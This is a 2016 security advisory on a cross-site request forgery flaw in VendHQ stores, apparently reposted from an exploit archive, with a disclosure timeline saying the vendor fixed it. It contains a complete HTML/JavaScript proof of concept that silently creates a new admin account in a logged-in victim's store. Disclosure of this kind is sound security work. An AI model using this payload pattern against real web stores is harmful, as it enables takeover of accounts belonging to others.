VendHQ Cross Site Request Forgery
Posted on 30 November -0001
<HTML><HEAD><TITLE>VendHQ Cross Site Request Forgery</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ # | ___ _ _____ _ _ | # | / _ | | |_ _| | | (_) | # | / /_ |__ ___ __ _ _ __ | | __ _| |__ _ _ __ | # | | _ | '_ / __|/ _` | '_ | |/ _` | '_ | | '__| | # | | | | | | | __ (_| | | | | | | (_| | | | | | | | # | _| |_/_| |_|___/__,_|_| |_| _/__,_|_| |_|_|_| | # | // Breaking Security Since Born! | # | | # | [-] Website: https://ahsantahir.py | # | [-] Email: support@ahsantahir.py | # | | # +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ ### # Title : VendHQ Add-admin CSRF Vulnerability [Full-Store Takeover] # Author : Ahsan Tahir # E-mail : mrahsan1337@gmail.com / support@ahsantahir.py # Web Site : www.ahsantahir.py # Facebook: http://fb.me/ahsantahiratofficial # Twitter : @AhsanTahirAT # Tested on : Kali Linux 2.0, Windows 8.1 # Vendor : https://www.vendhq.com ### Release Date: ============= 2016-10-14 Product & Service Introduction: =============================== Vend is retail POS software, inventory management, ecommerce & customer loyalty for iPad, Mac and PC. Easily manage & grow your business in the cloud. Abstract Advisory Information: ============================== Ahsan Tahir, an independent vulnerability researcher discovered an add-admin CSRF vulnerability, which could lead to full store-takeover of any VendHQ store! Vulnerability Disclosure Timeline: ================================== 2016-07-20: Found the vulnerability. 2016-07-20: Reported to vendor. 2016-07-22: Vendor Replied. 2016-07-22: Vendor Fixed the vulnerability. 2016-07-31: Vendor rewarded the researcher. 2016-10-14: Public Disclosure Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A Cross-Site Request Forgery vulnerability has been discovered in VendHQ stores. This allows remote attackers to craft a HTML Form, which requests a new admin on vendhq stores, when run by a victim, while he/she is logged in, and if the victim visits a page, his/her store will be HACKED/Pwn3d! Proof of Concept (PoC): ======================= This vulnerability can be exploited by an attacker if he/she injects this code in his webpage, which they want their victim to visit! <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://<your-store>.vendhq.com/user/create", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------30540262821640"); xhr.withCredentials = true; var body = "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[vend_image_user_new][id]" " + " " + " " + "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[id]" " + " " + " " + "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[name]" " + " " + "Hacked " + "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[display_name]" " + " " + "A cashier " + "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[email]" " + " " + "ahsan@ahsan.com " + "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[password]" " + " " + "TestingPassword1 " + "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[password_again]" " + " " + "TestingPassword1 " + "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[group_id]" " + " " + "5 " + "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[outlet_id][]" " + " " + " " + "-----------------------------30540262821640 " + "Content-Disposition: form-data; name="vend_user[vend_image_user_new][image]"; filename="" " + "Content-Type: application/octet-stream " + " " + " " + "-----------------------------30540262821640-- "; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> While a victim is logged in to his/her vend store and visits a webpage with the above code injected, a new admin will be created in their store, with the name as "Hacked" and the Password is "TestPassword1" and email: ahsan@ahsan.com Credits & Authors: ================== Ahsan Tahir - [https://twitter.com/AhsanTahirAT] </BODY></HTML>
